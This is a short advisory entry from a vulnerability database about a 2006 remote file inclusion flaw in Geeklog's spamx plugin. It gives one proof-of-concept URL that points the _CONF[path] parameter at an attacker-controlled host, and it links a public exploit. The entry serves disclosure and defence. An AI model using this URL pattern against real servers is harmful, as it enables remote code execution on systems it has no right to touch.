Geeklog spamx/MailAdmin.Action.class.php _CONF[path] Variable Remote File Inclusion

2006-06-29T00:00:00
ID OSVDB:35805
Type osvdb
Reporter OSVDB
Modified 2006-06-29T00:00:00

Description

Manual Testing Notes

http://[target]/[path]/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=[attacker]

References:

Related OSVDB IDs: 35798, 35804, 35809, 35801, 35802, 35803, 35808, 35810, 35811, 35812, 35806, 35807, 35799, 35800
ISS X-Force ID: 27469
Generic Exploit URL: http://milw0rm.com/exploits/1963
CVE-2006-6225
Bugtraq ID: 18740